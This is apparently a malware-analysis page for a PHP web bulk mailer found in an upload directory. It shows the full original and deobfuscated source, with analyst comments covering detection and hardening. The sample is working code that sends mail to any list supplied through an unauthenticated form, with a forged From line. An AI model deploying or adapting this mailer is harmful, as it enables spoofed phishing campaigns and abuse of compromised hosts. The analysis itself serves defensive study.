PHP Malware Analysis

Thund3rC4sH.php

md5: 90c604a876418d1c7932c46577560a50


Screenshot


Attributes

Encoding

Environment

Input


Deobfuscated PHP code

<?php

// Analyst annotation: these comments were added for review and are not part of
// the sample.
// Summary: browser-driven bulk mailer. A request without a non-empty POST field
// 'Sa007' gets the compose form; a request with it runs the send loop below.
// No password, session or source-address check appears anywhere in this listing,
// so anyone who can reach the URL can make the host send mail.
// The execution trace on this page ran the file from /var/www/html/uploads/,
// a path that looks like an upload directory; denying PHP execution in upload
// directories is the control that stops this class of uploaded script.
if (empty($_POST['Sa007'])) {
    // Set to '' and never read again in this deobfuscated listing.
    $Sa002 = '';
    $Sa003 = '';
    $Sa004 = '';
    $Sa005 = '';
    ?>
	<DIV STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
		<FORM NAME="Sa001" METHOD="POST" ACTION="<?php 
    // The form posts back to the same URL and keeps the query string; both
    // $_SERVER values are echoed without escaping.
    echo $_SERVER['PHP_SELF'] . "?" . $_SERVER['QUERY_STRING'];
    ?>">
			<P STYLE="MARGIN: 2PX;">
				<B>N</B>ome:&nbsp;<BR>
			</P>
			<P STYLE="MARGIN: 2PX;">
				<INPUT TYPE="TEXT" SIZE="45" NAME="Sa002" VALUE="<?php 
    // Folded by the deobfuscator: the original sample has `$Sa002 ? $Sa002 : ""`
    // here, which is always "" because $Sa002 was just set to ''. The Sa003 and
    // Sa004 fields below were folded the same way.
    echo "";
    ?>" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
			</P>

			<P STYLE="MARGIN: 2PX;">
				<B>E</B>-Mail:&nbsp;<BR>
			</P>
			<P STYLE="MARGIN: 2PX;">
				<INPUT TYPE="TEXT" SIZE="45" NAME="Sa003" VALUE="<?php 
    echo "";
    ?>" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
			</P>

			<P STYLE="MARGIN: 2PX;">
				<B>A</B>ssunto:&nbsp;<BR>
			</P>
			<P STYLE="MARGIN: 2PX;">
				<INPUT TYPE="TEXT" SIZE="45" NAME="Sa004" VALUE="<?php 
    echo "";
    ?>" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
			</P>

			<P STYLE="MARGIN: 2PX;">
				<B>E</B>ngenharia:&nbsp;<BR>
			</P>
			<P STYLE="MARGIN: 2PX;">
				<TEXTAREA COLS="42" ROWS="10" NAME="Sa005" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;"><?php 
    // Folded by the deobfuscator: the original sample has
    // `$Sa005 ? htmlspecialchars(base64_decode($Sa005)) : ""` here. $Sa005 is
    // always '' in this branch, so base64_decode() is never reached.
    echo "";
    ?></TEXTAREA>
			</P>

			<P STYLE="MARGIN: 2PX;">
				<B>L</B>ist Mail:&nbsp;<BR>
			</P>
			<P STYLE="MARGIN: 2PX;">
				<TEXTAREA COLS="42" ROWS="10" NAME="Sa006" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;"></TEXTAREA>
			</P>

			<P STYLE="MARGIN: 2PX;">
				<INPUT TYPE="SUBMIT" NAME="Sa007" VALUE="Go!" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;BORDER: 1PX Solid #000000;"></TEXTAREA>
			</P>
		</FORM>
	</DIV>
<?php 
} else {
    // Removes PHP's execution time limit so a long recipient list is not cut
    // off; '@' hides the warning if the call is not permitted.
    @set_time_limit(0);
    // All five values come straight from the POST body with no validation.
    // Going by the form labels and the xsend() call below: Sa002 = sender display
    // name ("Nome"), Sa003 = sender address ("E-Mail"), Sa004 = subject
    // ("Assunto"), Sa005 = message body ("Engenharia"), Sa006 = recipient list
    // ("List Mail").
    $Sa = $_POST['Sa002'];
    $Sb = $_POST['Sa003'];
    $Sc = $_POST['Sa004'];
    $Sd = $_POST['Sa005'];
    $Se = $_POST['Sa006'];
    // One recipient per line. Blank lines are kept as entries, so the total $Sg
    // can exceed the number of real addresses.
    $Sf = explode("\n", $Se);
    $Sg = sizeof($Sf);
    // Declared inside the else branch, so xsend() only exists once a send
    // request has been made.
    // xsend(display name, from address, recipient, subject, body) returns the
    // result of mail().
    function xsend($Xa, $Xb, $Xc, $Xd, $Xe)
    {
        // Deobfuscator artifact: the original sample builds $Xf with a chain of
        // `.=`; here each step is shown as a full reassignment. Only the last
        // value (all four MIME lines) is used. Every message is therefore sent
        // as inline text/html, ISO-8859-1, 7bit.
        $Xf = "MIME-Version: 1.0\n";
        $Xf = "MIME-Version: 1.0\nContent-Type: text/html; charset=ISO-8859-1\n";
        $Xf = "MIME-Version: 1.0\nContent-Type: text/html; charset=ISO-8859-1\nContent-Transfer-Encoding: 7bit\n";
        $Xf = "MIME-Version: 1.0\nContent-Type: text/html; charset=ISO-8859-1\nContent-Transfer-Encoding: 7bit\nContent-Disposition: inline\n";
        // The From line is built from the submitted strings unmodified, so the
        // sender shown to recipients has no tie to the sending host.
        $Xf .= "From: \"" . $Xa . "\" <" . $Xb . ">\n";
        // '@' suppresses mail() warnings. stripslashes() presumably undoes
        // magic_quotes_gpc escaping on old PHP versions -- confirm.
        // A true return only means the local mail system accepted the message.
        return @mail($Xc, $Xd, "\n" . stripslashes($Xe) . "\n", $Xf);
    }
    // 1-based progress counter, printed as [$Sz/$Sg].
    $Sz = 1;
    print "<DIV STYLE=\"FONT-FAMILY: 'Courier New';FONT-SIZE: 13px;\">";
    // One mail() call per list line, all issued by the web server's PHP process.
    // Host-side signal: a burst of local mail submissions from the web/PHP
    // account. php.ini's mail.log and mail.add_x_header record which script
    // called mail() and help trace such bursts back to this file.
    foreach ($Sf as $Sh) {
        // trim() also strips the "\r" left by CRLF line endings.
        $Si = trim($Sh);
        $Sj = xsend($Sa, $Sb, $Si, $Sc, $Sd);
        if (!empty($Sj)) {
            // Blue status line; "Enviando" is Portuguese for "sending".
            // $Si is printed without HTML escaping.
            print "<P STYLE=\"MARGIN: 2PX;COLOR: #0000FF;\">";
            print "[{$Sz}/{$Sg}] [&nbsp;&nbsp;OK&nbsp;&nbsp;] Enviando...: {$Si}!";
            print "</P>";
        } else {
            // Red status line; "Falhou" is Portuguese for "failed".
            print "<P STYLE=\"MARGIN: 2PX;COLOR: #FF0000;\">";
            print "[{$Sz}/{$Sg}] [Falhou] Enviando...: {$Si}!";
            print "</P>";
        }
        $Sz++;
    }
    print "</DIV>";
}
?>



Execution traces

data/traces/90c604a876418d1c7932c46577560a50_trace-1676243664.0934.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:14:49.991249]
1	0	1	0.000161	393576
1	3	0	0.000223	399216	{main}	1		/var/www/html/uploads/Thund3rC4sH.php	0	0
1	3	1	0.000272	399216
			0.000299	314264
TRACE END   [2023-02-12 21:14:49.991419]


Generated HTML code

<html><head></head><body><div style="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
		<form name="Sa001" method="POST" action="/Thund3rC4sH.php?">
			<p style="MARGIN: 2PX;">
				<b>N</b>ome:&nbsp;<br>
			</p>
			<p style="MARGIN: 2PX;">
				<input type="TEXT" size="45" name="Sa002" value="" style="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
			</p>

			<p style="MARGIN: 2PX;">
				<b>E</b>-Mail:&nbsp;<br>
			</p>
			<p style="MARGIN: 2PX;">
				<input type="TEXT" size="45" name="Sa003" value="" style="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
			</p>

			<p style="MARGIN: 2PX;">
				<b>A</b>ssunto:&nbsp;<br>
			</p>
			<p style="MARGIN: 2PX;">
				<input type="TEXT" size="45" name="Sa004" value="" style="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
			</p>

			<p style="MARGIN: 2PX;">
				<b>E</b>ngenharia:&nbsp;<br>
			</p>
			<p style="MARGIN: 2PX;">
				<textarea cols="42" rows="10" name="Sa005" style="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;"></textarea>
			</p>

			<p style="MARGIN: 2PX;">
				<b>L</b>ist Mail:&nbsp;<br>
			</p>
			<p style="MARGIN: 2PX;">
				<textarea cols="42" rows="10" name="Sa006" style="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;"></textarea>
			</p>

			<p style="MARGIN: 2PX;">
				<input type="SUBMIT" name="Sa007" value="Go!" style="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;BORDER: 1PX Solid #000000;">
			</p>
		</form>
	</div>
<!--?
	} else {
		@set_time_limit(0);
		$Sa=$_POST['Sa002'];
		$Sb=$_POST['Sa003'];
		$Sc=$_POST['Sa004'];
		$Sd=$_POST['Sa005'];
		$Se=$_POST['Sa006'];
		$Sf=explode("\n",$Se);
		$Sg=sizeof($Sf);
		function xsend($Xa,$Xb,$Xc,$Xd,$Xe) {
				$Xf = "MIME-Version: 1.0\n";
				$Xf .= "Content-Type: text/html; charset=ISO-8859-1\n";
				$Xf .= "Content-Transfer-Encoding: 7bit\n";
				$Xf .= "Content-Disposition: inline\n";
				$Xf .= "From: \"".$Xa."\" <".$Xb."-->\n";
				return @mail($Xc,$Xd,"\n".stripslashes($Xe)."\n",$Xf);
		}
		$Sz=1;
		print("<div style="\&quot;FONT-FAMILY:" 'courier="" new';font-size:="" 13px;\"="">"); 
		foreach($Sf as $Sh) {
			$Si=trim($Sh);
			$Sj=xsend($Sa,$Sb,$Si,$Sc,$Sd);
			if (!empty($Sj)) {
				print("<p style="\&quot;MARGIN:" 2px;color:="" #0000ff;\"="">");
				print("[{$Sz}/{$Sg}] [&nbsp;&nbsp;OK&nbsp;&nbsp;] Enviando...: {$Si}!");
				print("</p>");
			} else {
				print("<p style="\&quot;MARGIN:" 2px;color:="" #ff0000;\"="">");
				print("[{$Sz}/{$Sg}] [Falhou] Enviando...: {$Si}!");
				print("</p>");
			}
			$Sz++;
		}
		print("</div>"); 
	}
?&gt;


</body></html>

Original PHP code

<?
	// Analyst annotation: these comments were added for review. The md5 shown on
	// this page is presumably of the uploaded file, which does not contain them.
	// The sample uses the short open tag, which PHP only honours when
	// short_open_tag is enabled; the echo tag (<?=) works regardless on PHP >= 5.4.
	// In the "Generated HTML code" section of this page the else branch appears
	// as literal text inside an HTML comment, which suggests short tags were off
	// in the sandbox and that only the <?= expressions were evaluated there.
	// On a host configured that way the mailer logic does not run and its source
	// is served to visitors instead.
	if (empty($_POST['Sa007'])) {
		// Initialised to '' immediately before the form's ternaries test them, so
		// every VALUE attribute renders empty and base64_decode() is never called.
		// Possibly left over from a variant that pre-filled the form -- unconfirmed.
		$Sa002='';
		$Sa003='';
		$Sa004='';
		$Sa005='';
?>
	<DIV STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
		<FORM NAME="Sa001" METHOD="POST" ACTION="<?=$_SERVER['PHP_SELF']."?".$_SERVER['QUERY_STRING'];?>">
			<P STYLE="MARGIN: 2PX;">
				<B>N</B>ome:&nbsp;<BR>
			</P>
			<P STYLE="MARGIN: 2PX;">
				<INPUT TYPE="TEXT" SIZE="45" NAME="Sa002" VALUE="<?=$Sa002 ? $Sa002 : "";?>" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
			</P>

			<P STYLE="MARGIN: 2PX;">
				<B>E</B>-Mail:&nbsp;<BR>
			</P>
			<P STYLE="MARGIN: 2PX;">
				<INPUT TYPE="TEXT" SIZE="45" NAME="Sa003" VALUE="<?=$Sa003 ? $Sa003 : "";?>" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
			</P>

			<P STYLE="MARGIN: 2PX;">
				<B>A</B>ssunto:&nbsp;<BR>
			</P>
			<P STYLE="MARGIN: 2PX;">
				<INPUT TYPE="TEXT" SIZE="45" NAME="Sa004" VALUE="<?=$Sa004 ? $Sa004 : "";?>" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;">
			</P>

			<P STYLE="MARGIN: 2PX;">
				<B>E</B>ngenharia:&nbsp;<BR>
			</P>
			<P STYLE="MARGIN: 2PX;">
				<TEXTAREA COLS="42" ROWS="10" NAME="Sa005" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;"><?=$Sa005 ? htmlspecialchars(base64_decode($Sa005)) : "";?></TEXTAREA>
			</P>

			<P STYLE="MARGIN: 2PX;">
				<B>L</B>ist Mail:&nbsp;<BR>
			</P>
			<P STYLE="MARGIN: 2PX;">
				<TEXTAREA COLS="42" ROWS="10" NAME="Sa006" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;"></TEXTAREA>
			</P>

			<P STYLE="MARGIN: 2PX;">
				<INPUT TYPE="SUBMIT" NAME="Sa007" VALUE="Go!" STYLE="FONT-FAMILY: 'VERDANA';FONT-SIZE: 12px;BORDER: 1PX Solid #000000;"></TEXTAREA>
			</P>
		</FORM>
	</DIV>
<?
	} else {
		// Send path: reached by any POST carrying a non-empty 'Sa007'. The file
		// contains no authentication check before this point.
		// set_time_limit(0) lifts the execution time limit; '@' hides any warning.
		@set_time_limit(0);
		// Sender name, sender address, subject, body and recipient list are read
		// from the POST body as submitted.
		$Sa=$_POST['Sa002'];
		$Sb=$_POST['Sa003'];
		$Sc=$_POST['Sa004'];
		$Sd=$_POST['Sa005'];
		$Se=$_POST['Sa006'];
		// Recipient list is split on "\n"; $Sg is the raw line count.
		$Sf=explode("\n",$Se);
		$Sg=sizeof($Sf);
		// Sends one message: $Xa/$Xb form the From line, $Xc is the recipient,
		// $Xd the subject, $Xe the body. Returns whatever mail() returns.
		function xsend($Xa,$Xb,$Xc,$Xd,$Xe) {
				// Fixed MIME headers: inline text/html, ISO-8859-1, 7bit, with
				// header lines separated by "\n".
				$Xf = "MIME-Version: 1.0\n";
				$Xf .= "Content-Type: text/html; charset=ISO-8859-1\n";
				$Xf .= "Content-Transfer-Encoding: 7bit\n";
				$Xf .= "Content-Disposition: inline\n";
				// Sender name and address are taken from the form unmodified.
				$Xf .= "From: \"".$Xa."\" <".$Xb.">\n";
				// Errors are suppressed with '@'; the body is passed through
				// stripslashes() and wrapped in newlines.
				return @mail($Xc,$Xd,"\n".stripslashes($Xe)."\n",$Xf);
		}
		// Progress counter for the [$Sz/$Sg] status prefix.
		$Sz=1;
		print("<DIV STYLE=\"FONT-FAMILY: 'Courier New';FONT-SIZE: 13px;\">"); 
		// One mail() call per list line. On the host this shows up as many local
		// mail submissions from the web server account within a single request.
		foreach($Sf as $Sh) {
			$Si=trim($Sh);
			$Sj=xsend($Sa,$Sb,$Si,$Sc,$Sd);
			// Per-recipient status line (Portuguese: "Enviando" = sending,
			// "Falhou" = failed); $Si is printed without HTML escaping.
			if (!empty($Sj)) {
				print("<P STYLE=\"MARGIN: 2PX;COLOR: #0000FF;\">");
				print("[{$Sz}/{$Sg}] [&nbsp;&nbsp;OK&nbsp;&nbsp;] Enviando...: {$Si}!");
				print("</P>");
			} else {
				print("<P STYLE=\"MARGIN: 2PX;COLOR: #FF0000;\">");
				print("[{$Sz}/{$Sg}] [Falhou] Enviando...: {$Si}!");
				print("</P>");
			}
			$Sz++;
		}
		print("</DIV>"); 
	}
?>